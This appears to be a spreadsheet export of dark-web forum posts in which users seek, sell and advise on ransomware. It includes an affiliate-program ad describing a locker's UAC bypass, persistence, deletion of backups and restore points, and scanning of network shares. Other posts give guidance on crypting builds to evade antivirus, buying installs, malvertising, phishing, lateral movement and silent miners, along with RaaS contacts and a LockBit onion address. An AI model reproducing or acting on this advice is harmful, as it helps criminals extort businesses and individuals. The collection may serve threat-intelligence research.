    <t>go check out;/d/redeemer;.  i'm not sure how exactly their ransomware works but it's free and they have lots of support there.  the ransomware is already all built, you just have to pay a fee everytime you succesfully use it.  like i said though, i don't know much about it other than that.  go ask them.;;s;t;a;r;l;e;s;s</t>
  </si>
  <si>
    <t>/u/Starless</t>
  </si>
  <si>
    <t>29/07/2022 22:03</t>
  </si>
  <si>
    <t>f2ec2f2e62c6fe2e128a</t>
  </si>
  <si>
    <t>can someone with no skills get into ransomware?</t>
  </si>
  <si>
    <t>2 days 23:37:00</t>
  </si>
  <si>
    <t>the ransomware is the easy part. system and network penetration is the challenge. there is also psychology and social engineering to consider, the process often needs a user with permission to be fooled into running it. unless the system has a very bad privilege escalation vulnerability. those millionaire targets are usually large organisations with money to spend on their infrastructure. deploying it to the every day amateur user is easier but there is less money, no honour and little fun in doing that imho.</t>
  </si>
  <si>
    <t>30/07/2022 04:35</t>
  </si>
  <si>
    <t>0 days 06:32:00</t>
  </si>
  <si>
    <t>how to change the btc adress in wnnacry ptya or conti ?;thx</t>
  </si>
  <si>
    <t>/u/55crip</t>
  </si>
  <si>
    <t>8e5c7e0df44254abae4d</t>
  </si>
  <si>
    <t>change ransomware</t>
  </si>
  <si>
    <t>5 days 13:06:00</t>
  </si>
  <si>
    <t>i need both, the cryptolocker and tool to change btc... can i pm you?</t>
  </si>
  <si>
    <t>15/06/2022 03:28</t>
  </si>
  <si>
    <t>hello friends!;;we are looking for partners to join our crypto-locker affiliate program.;;we have been working in this direction, tested dozens of different offers, did not find the best solution from the finished ones, created our product, successfully tested within the team and are ready to accept 10 new partners .;;description:;;crypto-locker is an invisible program in a static assembly written in c ++.;;the program is native and does not require additional libraries for its work.;;��� at startup, the locker verifies that no other instances of the program have been launched.;;��� then, it bypasses the uac, and in case of failure will ask the user until he clicks the yes button.;;��� then it is added to autoload. being at startup at the specified interval, checks that the locker is running. if the locker is not running, it will start it (protection against closing).;;��� before starting work, the locker will stop and delete the specified services.;;��� then complete the indicates and processes recommended for stopping and closing are in the standard settings, but you can always add your own);;��� next, it will empty the recycle bin, delete backup copies and system restore points.;;��� getting started, the locker will endlessly ���hang��� in memory and work, constantly scanning disks (hard drives, flash drives, network drives, etc.), as well as scanning the network to detect shared resources.;;��� before starting the actual scan and encryption, the locker will generate a unique key for encrypting files using the aes256 algorithm, encrypt this key with the rsa2048 algorithm and create an id for the pc from the encrypted key.;;��� for each disk or shared resource found, it is allocated downstream to encrypt files.;;��� if any file is blocked by an open program, locker will find and close the program blocking the file ,and then try to re-encrypt the file. surely, you are familiar with a situation when a file cannot be edited, because it is open close this program and process the file.;;��� the locker supports file encryption rules: full (encrypts the entire file), headers + 10 mb (partially encrypts the file), exceptions (does not encrypt the file). the speed of work greatly depends on the selected rules, by default only databases are completely encrypted, the rest is based on the headers, excluding system files and .exe (you can specify your settings).;;��� in each directory where the files were encrypted, locker leaves a note containing a unique user id.;;��� the locker constantly ���hangs��� in memory and continues to scan for new disks or files. when you connect new hdd / flash drives, the locker immediately begins to work them out in a separate stream.;;of course, all standard specifications are valid for our product:;;- it works offline.;;- not amenable to third-party decryption.;;- the decryptor restores all files (large and database).;;- high speed, for each disk creates its own stream.;;- applies to accessiblec its own unique id is generated.;;- for each partner, a build with a unique encryption key is generated.;;- free decryption of one file for each client as a guarantee.;;thanks to such a system, none of the partners will be able to throw the client on a decrypt, which means there will be no negative reviews that are so critical for further payments.;;interaction with partners.;;1) the crypto locker is not for sale, only ready-made builds with your contacts for% of payments, any number of builds and all updates are free.;;2) at the moment, the build is working offline, mail is used as contacts. you will need 2 mails on different domains with access to them.;;if necessary, we will issue an rdp server to host these mails (for new partners, the service is paid).;;3) the locker build is created and issued to you in an uncrypted form, the partner does all further improvements on his own and we strongly recommend checking the build���s performance on various oss after modifications.;;4) communication with clie carried out by us or a partner, we provide templates for correspondence. test files - we do, the keys for the decrypt always remain only with us.;;5) installation of the build - either by a partner yourself, or by our team.;;6) for interest - the conditions are individual, you can always agree.;;7) for productive partners, we will modify the build upon request, from the drop file and small build settings, to changing the encryption algorithms and key generation (for example, each file can be encrypted with a unique aes key);;hurry up to take a place, the first contact in the pm.;;the message must indicate the source, geo and the number of downloads, work experience.;;conditions:;;they are negotiated individually for each advert depending on volumes and material.;;start earning with us!;;functional:;;reliable cryptographic algorithm using global and session keys + random file keys;;;scan all local drives and all available network paths;;;high speed: a separate stream works for each disk and network path;;;skipping windows system directories and browser directories;;;decryptor generation based on an encrypted file;;;correct work on all oss from windows xp, server 2003 to the latest;;;the locker has no dependencies, does not use third-party libraries;;the completion of some processes to free open files (optional, negotiated);;;the ability to encrypt files without changing extensions (optional);;;removing recovery points + cleaning logs on a dedicated server (optional);;;standard options: tapping, autoload, self-removal (optional);;;nb; looking for affiliate partners with access to rdp\vnc\teamviewer\webshell\sql inj [sql injection] in corporate networks, stores, and other companies.;;hurry up to take a place, the first contact in the pm.;;the message must indicate the source, geo and the number of downloads, work experience.;;conditions:;;they are negotiated individually for each advert depending on volumes and material.;;start earning with us!;;flanker@jabbim.com</t>
  </si>
  <si>
    <t>Group providing services</t>
  </si>
  <si>
    <t>/u/Flanker</t>
  </si>
  <si>
    <t>17/02/2020 14:29</t>
  </si>
  <si>
    <t>016f20a58647018f15ab</t>
  </si>
  <si>
    <t>crypto-locker (Ransomware) affiliate program</t>
  </si>
  <si>
    <t>hello my fellow hackers , like the title says i've enabled the chatroom in d/hacking so it's easier for you guys to ask questions , talk around , discuss about stuff.;;now go and have some fun :d;;basic guidelines:;;try to keep all the convos there and shift to pm only when required;no doxing;no advertising;no spamming in the chatroom (may result in a 24 hour ban);no simping;post virustotal links along with the stuff you post;be kind to newbies;do not advertise about your services here and post it on jobs4crypto</t>
  </si>
  <si>
    <t>Provinf hacker information and safe space to discuss hacking</t>
  </si>
  <si>
    <t>30/11/2020 18:08</t>
  </si>
  <si>
    <t>6ac3e0ce14f88679bc53</t>
  </si>
  <si>
    <t>d/hacking Chatroom!!!</t>
  </si>
  <si>
    <t>404 days 04:49:00</t>
  </si>
  <si>
    <t>does anyone know where to get the latest solid ransomware malware these days? i thought of hacktown but does anyone have experience with them and the products they sell such as in the armory section and that?;;really would appreciate any help please people :))))))</t>
  </si>
  <si>
    <t>22/09/2022 11:11</t>
  </si>
  <si>
    <t>a0a9c7da1f61019ae4e9</t>
  </si>
  <si>
    <t>does anyone know...</t>
  </si>
  <si>
    <t>1 days 00:08:00</t>
  </si>
  <si>
    <t>i have the same question :)</t>
  </si>
  <si>
    <t>/u/asdfghjklyxcvbnm</t>
  </si>
  <si>
    <t>22/09/2022 15:29</t>
  </si>
  <si>
    <t>0 days 04:18:00</t>
  </si>
  <si>
    <t>breached.to;;but you will only ever get something useful if you take the time to audit and customise what you find</t>
  </si>
  <si>
    <t>/u/iwantfreedrugz</t>
  </si>
  <si>
    <t>22/09/2022 17:57</t>
  </si>
  <si>
    <t>what do you mean? looking for some ransomware that specifically encrypts victims computer when a link is clicked or download from email or something, what the link to breached? could you help me out with ransomware do you have a programs to spare my friend?</t>
  </si>
  <si>
    <t>22/09/2022 21:28</t>
  </si>
  <si>
    <t>0 days 03:31:00</t>
  </si>
  <si>
    <t>oi, ill let you know if i can find some solid ransomware and you do the same my friend :);been looking for some since the start of the year</t>
  </si>
  <si>
    <t>22/09/2022 21:30</t>
  </si>
  <si>
    <t>breached.to are you sure because the site requires java which is a retarded opsec risk, is it safe or what?</t>
  </si>
  <si>
    <t>23/09/2022 10:26</t>
  </si>
  <si>
    <t>a lot of these fraud sites require javascript which clearly shows their creators lack of skills.;i've always said you can't be good at everything at once lol</t>
  </si>
  <si>
    <t>/u/legraiser</t>
  </si>
  <si>
    <t>23/09/2022 10:56</t>
  </si>
  <si>
    <t>so it aint safe, what would be a safe way of accessing a site that requires java</t>
  </si>
  <si>
    <t>23/09/2022 10:58</t>
  </si>
  <si>
    <t>it's because cryptocurrency is booming and the people that were already making money just got a big boost to their profits with the crypto boom and no longer need forums to help them succeed.;;this is how it's always been. be part of a group/forum that makes good money plus adding the cryptocurrency boom means everyone disappears and is laughing their way to the bank.;;everyone should be full tilt into performing carding, hacking, ransomwaring, etc. to make that money while riding this boom.;;as others said...once you've learned how to be self-sufficient and are generating profits on your own you don't need anyone else.</t>
  </si>
  <si>
    <t>15/01/2021 21:52</t>
  </si>
  <si>
    <t>3557d1ed451237bc168c</t>
  </si>
  <si>
    <t>does dread forum seen kinda dead anymore?</t>
  </si>
  <si>
    <t>0 days 13:42:00</t>
  </si>
  <si>
    <t>1 days 05:37:00</t>
  </si>
  <si>
    <t>are there any known, reputable providers of ransomware?  would be grateful for a finger in the right direction</t>
  </si>
  <si>
    <t>/u/plainEngrish</t>
  </si>
  <si>
    <t>24/12/2021 18:38</t>
  </si>
  <si>
    <t>16dac3d75446469afe76</t>
  </si>
  <si>
    <t>dread get rid of search function? looking for some direction.</t>
  </si>
  <si>
    <t>few months back i checked my spam folder .. there were some emails from nigerian prince, i won the lottery, some guy caught me jerking off on my front camera and he threatened to send it to my contact list if i don't send him 300$ in btc. i thought to myself are there really people that stupid to send money to those people .. i googled it and there is never-ending list of people who complain how they got scammed this way. one guy commented on my post when i asked about carding, and told me that spamming can be more profitable than carding if done right. so i still want to do carding but first i need some seed money so i tought i could do a bit of spamming first .. i watched a lot of videos about cold mails how to avoid spam filters and stuff like that .. but those are probably not usable when spamming for crypto ransomwares, because you need some kind of domains so you look more trustworthy, but if you buy those they are also tracable back to your payment method. so my gestion is is someone making money this way ? how you avoid spam filters ? is there a way i can do this without any investments ? and what are the best ways to approach this ? also i saw some kind of malware that encrypts your files and you can't do shit until you send crypto to the adress,  i assume that i need to pay for those .. but where to find them ? thanks a lot for your answers in advance.</t>
  </si>
  <si>
    <t>/u/krmak</t>
  </si>
  <si>
    <t>0fcd5afd8d319d3001fe</t>
  </si>
  <si>
    <t>email ransomware spam</t>
  </si>
  <si>
    <t>ad77d086d7d21a9933a5</t>
  </si>
  <si>
    <t>encrypt all files  mallware</t>
  </si>
  <si>
    <t>1 days 01:28:00</t>
  </si>
  <si>
    <t>yeah, fair point. has your ransomwear been detected by any avs yet, by reports from your users?</t>
  </si>
  <si>
    <t>cerco un esperto in ransomware. ho la possibilita di far colpire una sede di una grossa multinazionale di trasporti, e con alta probabilita anche numerosissime aziende con cui lavorano.;no gente che si improvvisa esperto infomratico perfavore.</t>
  </si>
  <si>
    <t>/u/toshiba</t>
  </si>
  <si>
    <t>13/07/2022 22:51</t>
  </si>
  <si>
    <t>e41881d5ec66b0edd734</t>
  </si>
  <si>
    <t>esperto ransomware</t>
  </si>
  <si>
    <t>how would i get started in this business with no russian language? no any starting funds? i understand though that it is very scrutinized from what i have heard and very competative but thats not my end goal. i just want a steady workflow from people. i already have several strong lockers i have reverse engineered into working code and im interested in reusing them somehow for profit? no success at all when i try i just assume im too new or i need to have russian. i just want to prove myself all that work was not waste of my time.</t>
  </si>
  <si>
    <t>8ce618439cc8f7d2a97f</t>
  </si>
  <si>
    <t>getting into the locker business [RaaS?]</t>
  </si>
  <si>
    <t>3 days 03:32:00</t>
  </si>
  <si>
    <t>i recommend you to make your raas page and offer people the ransomware, obviously create a good ransomware, check that everything encrypts and above all decrypts without problems, it would be good if you also know at an advanced level if you can reverse engineer your ransomware to see if you can discover vulnerabilities in the code. the russians are the ones that stand out the most but if you do not care about that, just make a web page on the dark web, and provide your services, start small, it is normal that at first people are not very confident in your ransomware, so leave it at good prices and share significant evidence for them to see that your ransomware is powerful. and make sure that if you are updating your ransomware that everything works well because customers do not like to have problems, i hope this is a guide for you. if you have a good ransomware(locker &amp; cryptor), you can have a prosperous future regardless of being russian or not.</t>
  </si>
  <si>
    <t>/u/smyK</t>
  </si>
  <si>
    <t>0 days 08:53:00</t>
  </si>
  <si>
    <t>thanks for your input :) i was not expecting any serious response. you give hope that maybe i can potentially do it i just need to learn how to network better as i already have the lockers haha.</t>
  </si>
  <si>
    <t>Response to previous info provided</t>
  </si>
  <si>
    <t>13/07/2022 08:10</t>
  </si>
  <si>
    <t>2 days 18:39:00</t>
  </si>
  <si>
    <t>$1m in crypto or $1m in cash, i know ransomware guys have</t>
  </si>
  <si>
    <t>30/09/2022 04:36</t>
  </si>
  <si>
    <t>955a2ba9a545a83cc63c</t>
  </si>
  <si>
    <t>has anyone here made $1m off deep web stuff?</t>
  </si>
  <si>
    <t>this sub look ded im lookin for info on ransomware newb here target in mind</t>
  </si>
  <si>
    <t>/u/martymcbotfly</t>
  </si>
  <si>
    <t>14/02/2022 09:32</t>
  </si>
  <si>
    <t>023fa8c9a07ea8ccde3c</t>
  </si>
  <si>
    <t>hello?</t>
  </si>
  <si>
    <t>5 days 14:24:00</t>
  </si>
  <si>
    <t>take a look at crypto stealer and ransomwares</t>
  </si>
  <si>
    <t>/u/JungleJody</t>
  </si>
  <si>
    <t>21/11/2021 16:58</t>
  </si>
  <si>
    <t>5d5faa5e7ddff0f43c03</t>
  </si>
  <si>
    <t>how do hackers make money?</t>
  </si>
  <si>
    <t>0 days 01:59:00</t>
  </si>
  <si>
    <t>1 days 22:06:00</t>
  </si>
  <si>
    <t>i am trying to hit someone with ransomware through email.;;i already know how to se them to download the file but i dont have a ransomware tool nor do i know how to code.;;are there any free tools like on github for ransomware?</t>
  </si>
  <si>
    <t>30/10/2021 06:13</t>
  </si>
  <si>
    <t>f07898f06210b85a1673</t>
  </si>
  <si>
    <t>how do i hit someone with ransomware?</t>
  </si>
  <si>
    <t>1 days 05:08:00</t>
  </si>
  <si>
    <t>check out my ransomware - redeemer available on;/d/redeemer;.;it's free to use and low fee (20% of ransom) for decryption.;it's made in c++ and has no dependencies.;;i'd advise against sending the ransomware itself. you should use a rat or backdoor which can be easily crypted and sent to the victim. after you gain persistent access with mentioned software, you can run the ransomware yourself whenever you want.</t>
  </si>
  <si>
    <t>30/10/2021 11:36</t>
  </si>
  <si>
    <t>0 days 05:23:00</t>
  </si>
  <si>
    <t>that sounds like a deal but i need more guidance and how i can trust you?</t>
  </si>
  <si>
    <t>30/10/2021 23:20</t>
  </si>
  <si>
    <t>0 days 11:44:00</t>
  </si>
  <si>
    <t>1) the ransomware/ransomware builder/decryption tool don't use internet at all, you can run them in vm/sandboxie as well.;2) the ransomware uses standard algorithms that are present everywhere, but in a style that's even more secure than usual.;3) the ransomware is designed to be easy to deploy once you have access to the system.;4) you don't need to trust me - in the sense that i will steal your victims for less money - because the master encryption key is encrypted with 2 keys - your key and mine. we both need to decrypt it in order for decryption to happen.</t>
  </si>
  <si>
    <t>31/10/2021 11:21</t>
  </si>
  <si>
    <t>0 days 12:01:00</t>
  </si>
  <si>
    <t>i read making $1m profit in 1 year is attainable in ransomware, i know about re evil, lock bit, dark side. how does a beginner get into that? do they have contact info?</t>
  </si>
  <si>
    <t>26/08/2022 23:47</t>
  </si>
  <si>
    <t>4e0c240205489dcdd5cf</t>
  </si>
  <si>
    <t>how does one become a partner/affilate of a ransomware group?</t>
  </si>
  <si>
    <t>2 days 00:44:00</t>
  </si>
  <si>
    <t>check your private messages</t>
  </si>
  <si>
    <t>/u/SteveMallman1</t>
  </si>
  <si>
    <t>27/08/2022 00:00</t>
  </si>
  <si>
    <t>you are talking about the big name groups. don't go into this expecting to make millions. like anything it takes a lot of your time to build it up.;;you also need to be able to bring something to the table. learn how to program, spam anything that could be useful.</t>
  </si>
  <si>
    <t>/u/Shakybeats</t>
  </si>
  <si>
    <t>27/08/2022 00:36</t>
  </si>
  <si>
    <t>to approach a big name of this speciality is complicated, on the other hand, you can test raas and even inform you on the excellent zeppelin...</t>
  </si>
  <si>
    <t>27/08/2022 01:24</t>
  </si>
  <si>
    <t>enjoy getting $1-2k pay check per month and repetitive labor work. that is a okay for russian/ee standards, not for americans. maybe not. good luck.</t>
  </si>
  <si>
    <t>27/08/2022 13:18</t>
  </si>
  <si>
    <t>0 days 11:54:00</t>
  </si>
  <si>
    <t>i read one group does that, conti or something, re evil gives 50% and others give 60% or more per job</t>
  </si>
  <si>
    <t>29/08/2022 00:29</t>
  </si>
  <si>
    <t>im slowing learning, im trying to figure out how to contact legit groups, so when i get to a point of being good at coding, i can be hired, and or know the right things to learn to join a ransom ware group</t>
  </si>
  <si>
    <t>29/08/2022 00:31</t>
  </si>
  <si>
    <t>how much do you make from ransomware?</t>
  </si>
  <si>
    <t>/u/zezida</t>
  </si>
  <si>
    <t>cd7a21e7a3c6e5362be1</t>
  </si>
  <si>
    <t>how much have you guys made form carding and when did you really start making alot??</t>
  </si>
  <si>
    <t>14 days 10:53:00</t>
  </si>
  <si>
    <t>me personally not much. i've hung up the towel and cashed out so just coasting in live.;;like everyone else out there ransomware and bec scams are of big interest. those are the go-to skills people are after.</t>
  </si>
  <si>
    <t>13/09/2021 22:52</t>
  </si>
  <si>
    <t>1 days 17:42:00</t>
  </si>
  <si>
    <t>you get conflicting answer because it is no average what do you mean average average ransomware for billion dollar company or average ransomware for neighbor down street who is mail man this is different kind of attack with different pay out average person i will say 200 dollar maybe 300 dollar up to maybe 600 or so but that is high end</t>
  </si>
  <si>
    <t>27/07/2022 05:34</t>
  </si>
  <si>
    <t>6e894b476984984ed094</t>
  </si>
  <si>
    <t>how much is the average payout for ransomware?</t>
  </si>
  <si>
    <t>3 days 20:17:00</t>
  </si>
  <si>
    <t>8 days 10:50:00</t>
  </si>
  <si>
    <t>ransomware payments are dependent victim to victim. it's calculated on the victims annual revenue and it's increased a bit with extortion.;;;1. google: website+revenue
2. zoomeinfo&amp;lsqb;dot&amp;rsqb;com
3. dnb&amp;lsqb;dot&amp;rsqb;.com
4. owler&amp;lsqb;dot&amp;rsqb;com
5. manta&amp;lsqb;dot&amp;rsqb;com</t>
  </si>
  <si>
    <t>/u/Booda</t>
  </si>
  <si>
    <t>31/07/2022 20:07</t>
  </si>
  <si>
    <t>4 days 14:33:00</t>
  </si>
  <si>
    <t>lets assume i have a foothold into a small business. i've compromised one machine via rat social engineering.there are currently 5 computers connected to one router just an example. i am struggling to think how it would be possible to move lateral in the environment and be able to compromise all the machines.there is nowear to move. i can run nmap check for open ports to enumerate and find potential information , ssh i would have to bruteforce unless i wait for worker to type in password if they even use connect to anything through ssh on their computer. i don't see how i can remotely connect and drop malware on their computers. i could possible try mitm each worker but it won't work on everyone. in active directory there are ways to move lateral but idk for small businesses any ideas? i just need someone to point me in direction i will do all the rest with research</t>
  </si>
  <si>
    <t>2dc0c64041283223f663</t>
  </si>
  <si>
    <t>how to move lateral on a smaller network and compromise the whole network</t>
  </si>
  <si>
    <t>4 days 14:42:00</t>
  </si>
  <si>
    <t>hey guys much appreciated if youre reading this , i live in a third world country and i have managed to fraud a bit by getting a premium vpn and a rooted android with 100 percent mock locations working pinpoint to my desired location but the earnings arent that big im making my money that i spent on a card plus a small chunk extra before burning the card. i only got like a month that i have been doing this before i didnt even knew that these things existed not to mention making money out of it.;my question to you guys is : what are my options to get some more money , i learn quick and im open to suggestions.;thank u all :)</t>
  </si>
  <si>
    <t>/u/c4912</t>
  </si>
  <si>
    <t>f769695d381ce07a1c12</t>
  </si>
  <si>
    <t>i live in a third world country what are my options?</t>
  </si>
  <si>
    <t>1 days 16:00:00</t>
  </si>
  <si>
    <t>spread a ransomware or a monero silent miner , very easy to do it , you can find it in the markets</t>
  </si>
  <si>
    <t>1 days 07:11:00</t>
  </si>
  <si>
    <t>i have a file that i want to send with smpt its a ransomware in jpeg so if you can use the smpt server let me know</t>
  </si>
  <si>
    <t>/u/usbrubberducky</t>
  </si>
  <si>
    <t>7e65533af72c5e972869</t>
  </si>
  <si>
    <t>i need help with smpt</t>
  </si>
  <si>
    <t>32 days 14:16:00</t>
  </si>
  <si>
    <t>you will need these tools for all your fraud or carding operations , to be 100% succesfull , otherwise you will fail;;maybe better try to spread rat to steal datas , try to spred ransomware , monero silent miner ... much easier</t>
  </si>
  <si>
    <t>337f7f276511881bb4ae</t>
  </si>
  <si>
    <t>i thought paypal logs are hard to do?</t>
  </si>
  <si>
    <t>1 days 23:12:00</t>
  </si>
  <si>
    <t>you can't make ransomware with python, you need to learn c/c++/c#, you need to learn windows libraries, you need to have good knowledge on how av's work, cryptography protocols, etc.</t>
  </si>
  <si>
    <t>23/07/2021 04:21</t>
  </si>
  <si>
    <t>ad31b7fb9010ad6d4aec</t>
  </si>
  <si>
    <t>i want to learn how to develop fud ransomware, how do i start?</t>
  </si>
  <si>
    <t>0 days 01:35:00</t>
  </si>
  <si>
    <t>isn't redline a credentials stealer? i think you got scammed or misunderstood what you bought.;! redline should be used completely different from a ransomware.;! i don't recommend buying malware from markets, they are usually old / detected by most avs / backdoored / overpriced.;;how to setup correctly?;- if you really got a ransomware, i recommend you creating two builds (or making sure you can create more builds on the run), one for companies (with a higher ransom price) and one for the normal users (with a smaller ransom price).;- crypt those builds! make sure they are undetected at scantime and most importantly at runtime. ransomware is getting caught pretty easily because it changes a lot of data / files in a short period of time, but good payload crypting can bypass everything.;- i also recommend hosting a .onion website (make sure it's hosted anonymously and configured correctly) if you want to target more important companies, not a lot of people will pay the ransom on a xmr address delivered by an email, believe me.;;how to spread it? here are some methods:;- you can find a lot of vendors offering "loads" on some hacking forums. you can get your payload dropped on already rat/botnet infected users.;prices: around 0.1$ per install, but some vendors don't allow any type of crypter/ransomware, make sure to read their tos;- contact malvertisers, they will place your payload on their fake websites / youtube videos / torrents until you get a paid number of installs.;prices: around 0.5$ per install / i think ~300$ for a week?;- buy a fake website design, for example minecraft/valorant/overwatch cheats, crypto exchanger or whatever you want, distribute malware by it;prices: around 95$ per website;- buy email leaks, use phishing tactics &amp; social engineering to drop a loader / a rat on the victim's computer, try to spread to their network and then execute the ransomware, etc.;- raas or working with groups, you can create a page / create a thread on a forum / contact some people to penetrate networks / companies and execute the payload for you, and after that you only need to share the profits with them;! i really don't recommend this one if you don't know what you're doing / don't have great opsec.;prices: free, but public forums don't allow ransomware so you may need to buy access to one;;but if you don't want to / don't know how to do the work by yourself, you can buy whatever you want for the right price, you just need to search correctly. leave a reply or contact me if you don't understand something / need help.</t>
  </si>
  <si>
    <t>/u/KylieXanner</t>
  </si>
  <si>
    <t>a85eb2c24714d474324b</t>
  </si>
  <si>
    <t>if i bought redline ransomware, what next?</t>
  </si>
  <si>
    <t>3 days 05:13:00</t>
  </si>
  <si>
    <t>shodan or targeting startup companies, checkout other ransomware groups' tactics, you can learn a lot from them. if you need help don't hesitate to contact me.</t>
  </si>
  <si>
    <t>0 days 19:07:00</t>
  </si>
  <si>
    <t>find out the ip of their webserver and then scanning it to see if i can get access?  i need access to the computers they do their everyday work right? nothing valuable will be on the webserver that the malware can encrypt. i have visited some ransomeware group websites but did not become any smarter. i am very noob however. do you have tips what to study if i use opensource ransomware like re***mer? i do not need to learn to code but i need knowledge of maybe powershell, ssh, anonymizing with tor, vps for phishing and so forth. do you have more buzzwords or topics. things i must learn more about if i take this route? much appreciation for your help</t>
  </si>
  <si>
    <t>/u/888rbb</t>
  </si>
  <si>
    <t>please help if you know where to purchase crypters from, needing ransomware since the start of the year i have a plan to execute but no malware to use 50/50 proff if you can source me out some ransomware please</t>
  </si>
  <si>
    <t>22/09/2022 21:32</t>
  </si>
  <si>
    <t>8e5d086e6d8ca10ab069</t>
  </si>
  <si>
    <t>in need of the lastest working ransomware avaliable</t>
  </si>
  <si>
    <t>from what i can see some are installed on the phone and need physical access intially while some others just require a person to log into the icloud and then it takes data from backups or something. not my thing tbh. i just know a friend of mine has a toxic x that can somehow see her txts and call logs remotely. was hoping to help her figure out how to put an end to that. would love to hit that motherfucker with some ransomware myself lol.</t>
  </si>
  <si>
    <t>/u/smurfdude</t>
  </si>
  <si>
    <t>15/03/2022 01:50</t>
  </si>
  <si>
    <t>2f27da20fb2ee7f32f17</t>
  </si>
  <si>
    <t>iphone hacking and live monitoring</t>
  </si>
  <si>
    <t>1 days 15:36:00</t>
  </si>
  <si>
    <t>i'm trying to develop ransomware with c# using the salsa20 encryption algorithm (random iv,random generation of encryption key, rfc2898derivebytes class with 5k iterations);is 80mb of the total file encrypted within 10 seconds good and fast enough ?;the key to encrypt the file is also encrypted again with public key rsa-4096.;i can't include the video link here because of the rules.</t>
  </si>
  <si>
    <t>edf8e4f5666e23ccfab6</t>
  </si>
  <si>
    <t>is my C# encryption speed good enough?</t>
  </si>
  <si>
    <t>i am interested in malware generally there isn't really anyone that i want to infect but  i am interested, if you were to infect someone to get his data deleted ( lets say ransomware ) can you get a ransomware from some random malware library and send it to someone;;the thing is how can you make it run without being clicked on? how can you make it bypass permissions ( android for example )? is there any malware like this that i can get? ( i have a vm and i also encrypted the disk space that i setup the vm on so i dont have to worry about getting infected while experimenting )</t>
  </si>
  <si>
    <t>/u/urmom69_69_69_69</t>
  </si>
  <si>
    <t>17/06/2022 23:05</t>
  </si>
  <si>
    <t>43ba40ddcbbd3f9ae522</t>
  </si>
  <si>
    <t>is there a way I can download malware and send it to someone?</t>
  </si>
  <si>
    <t>4 days 06:29:00</t>
  </si>
  <si>
    <t>zero day vulnerability means about a malware/exploit/ransomware or some kind of virus, which isn't have a solution till the moment, like is the case of pegasus, the software of massive surveillance which was on the news a month or a few months ago. is something really heavy, an exploit which makes you practically a god in the earth because the iot and the strong dependence of all the society of the phones and the internet. pegasus is a zero day vulnerability, by now. created by the nso groups, an israeli cyber arms firm.;;look this: ''the pegasus spyware, a malicious software (aka malware), is created by an israeli cyber arms firm called the nso group to combat terrorism and crime globally. the name 'pegasus' for this spyware was inspired by the trojan horse. the name suggests that it can be sent 'flying' through the air into various phones'';;i recommend you find vids or more info about it, quite interesting.</t>
  </si>
  <si>
    <t>22/06/2022 05:34</t>
  </si>
  <si>
    <t>take a look at;this collection of ransomware group sites;.</t>
  </si>
  <si>
    <t>011754e23df4a922672e</t>
  </si>
  <si>
    <t>leaked databases</t>
  </si>
  <si>
    <t>0 days 05:12:00</t>
  </si>
  <si>
    <t>qatux's list of articles released from hacker news. it's a safe assumption that anybody reading this article is here, in this place, because you started off with an end goal in mind with little to no knowledge of anything below our desired outcome. most people that are legitimately integrated in official cyber security research know the general theory that allowed them to move smoothly get the same result from the bottom up. you and i are here because this community is a light in the darkness of the void of the deep web. we all know how difficult it is to find the scraps we need to work backwards in the void so within these articles contain practical logistical intel regarding offensive and defense i cant fucking spell the world on there techniques - thats it. some of these articles show court and law enforcement documents that detail how that porn site last year was taken down, for example. and there plenty more gems in there that i personally found essential for me to "try to build my foundation" as i haven't signed up for any courses yet. personally i'd rather have people think i don't even know how to charge my phone than have documents saying i'm a professional hacker, but thats my two cents.;;i compiled this list for people trying to get their feet wet to try to learn backwards some of the "theory" thats necessary to really accomplish anything, as oppose to a bunch of scraps frantically being pieced together.;;https://thehackernews.com/2020/06/law-enforcement-data-breach.html;https://thehackernews.com/2020/11/chinese-apt-hackers-target-southeast.html;https://thehackernews.com/2020/11/new-modpipe-point-of-sale-pos-malware.html;https://thehackernews.com/2020/11/new-kimsuky-module-makes-north-korean.html;https://thehackernews.com/2020/10/ransomware-attack-hospital.html;https://thehackernews.com/2020/11/researcher-discloses-critical-rce-flaws.html;https://thehackernews.com/2020/11/trojanized-security-software-hits-south.html;https://thehackernews.com/2019/10/dark-web-child-abuse.html;https://thehackernews.com/2019/03/data-breach-security.html;https://thehackernews.com/2020/11/update-your-ios-devices-now-3-actively.html;https://thehackernews.com/2020/11/microsoft-releases-windows-security.html;https://thehackernews.com/2020/10/exploit-development.html;;part 2 (coming nov 23, will include a list of websites that track and monior the most prevelent threat actors , and most importantly to us, their methodoligies. besides the obvious bennefit of learning about the real life use of "whatever it is we may want to accomplish", there's countless drops of logistal info that strengthens our foundation just like part 1.;;i understand that this may be redundent to some, but enlightening to others which is why i wanted to share my list and my little recon project to strengthen the foundation of anybody who may need it. i'm not really so involved in this community yet but i know that i am certianlly happy to be here. enjoy!</t>
  </si>
  <si>
    <t>Talking about different news articles and  provides useful information</t>
  </si>
  <si>
    <t>/u/qatux</t>
  </si>
  <si>
    <t>22/11/2020 22:10</t>
  </si>
  <si>
    <t>e0e9b33e61f10fab4fc5</t>
  </si>
  <si>
    <t>list of articles from hackernews with valuable learning info for people like us</t>
  </si>
  <si>
    <t>hey wassup guy im looking for the lockbit2.0 raas i saw one link on dread but its not working can somebody help me please</t>
  </si>
  <si>
    <t>23/09/2021 21:16</t>
  </si>
  <si>
    <t>3a6ea1d0e28a6650e495</t>
  </si>
  <si>
    <t>77 days 05:54:00</t>
  </si>
  <si>
    <t>23/09/2021 21:05</t>
  </si>
  <si>
    <t>646b6ec393cccc5c9581</t>
  </si>
  <si>
    <t>lockbit2.0</t>
  </si>
  <si>
    <t>3 days 04:49:00</t>
  </si>
  <si>
    <t>i'm not sure about lockbit but there is someone selling ransomware bins and compilers (no crypter) on nemesis and other markets. i never raas but if you've got a crypter and good spreading method you could 100% do it yourself with a good bin</t>
  </si>
  <si>
    <t>23/09/2021 21:23</t>
  </si>
  <si>
    <t>{'lockbit': 1, 'ransomware': 1, 'raas': 1}</t>
  </si>
  <si>
    <t>http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion/</t>
  </si>
  <si>
    <t>/u/2hack</t>
  </si>
  <si>
    <t>26/09/2021 00:13</t>
  </si>
  <si>
    <t>2 days 02:50:00</t>
  </si>
  <si>
    <t>see post [1] for a comprehensive list of raas gang blogs and leak sites.;;[1];/post/10fd5836d407baef449d</t>
  </si>
  <si>
    <t>27/09/2021 01:54</t>
  </si>
  <si>
    <t>1 days 01:41:00</t>
  </si>
  <si>
